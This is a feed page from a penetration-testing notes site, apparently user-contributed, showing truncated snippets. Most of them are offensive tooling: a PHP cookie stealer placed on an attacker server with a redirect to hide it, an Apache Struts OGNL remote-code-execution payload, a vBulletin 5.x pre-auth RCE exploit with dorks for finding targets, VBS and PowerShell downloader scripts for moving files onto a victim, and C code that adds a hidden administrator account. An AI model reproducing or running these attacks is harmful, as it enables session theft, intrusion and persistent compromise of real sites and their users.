Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //


<?php
header ('Location:https://google.com');

$cookies = $_GET["c&q...


Score: 0

By: unknowndevice64 2019-10-19 01:28:48

The two most common HTTP methods are: GET and POST.
What is HTTP?
The Hypertext Transfer Protocol (HTTP) is designed to enable communications between clients and servers.
HTTP works as a request-response protocol between a client and server.
A web browser may be the client, and an application on a computer that hosts a web site may be the serve...


Score: 0


#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload +...


Score: 0


Set up the tunnel with this command:
ssh -D <your_ip>:<sock5_port> -f -C -q -N <user>@<server_ip>
ex.
ssh -D 192.168.64.64:6464 -f -C -q -N ud64@172.245.64.64
For local access remove IP:
ssh -D 6464 -f -C -q -N ud64@172.245.64.64

Explanation of arguments
-D: Tells SSH that we want a SOCKS tunnel on the specified por...


Score: 0


#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.ar...


Score: 0

By: ajayverma 2019-06-27 11:50:14

Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard of basic-web-security education has altered. Though it’s never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...


Score: 0


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...


Score: 0


Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]

On attacker machine:
copy file to transfer to: **/var/www**
start apache: **service apache2 start**



echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...


Score: 0


Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)-...


Score: 0


#include <stdlib.h>
int main()
{
int i;
int j;
i = system("net user [---username---] [---password---] /add");
j = system("net localgroup administrators [---username---] /add");
return 0;
}
...


Score: 0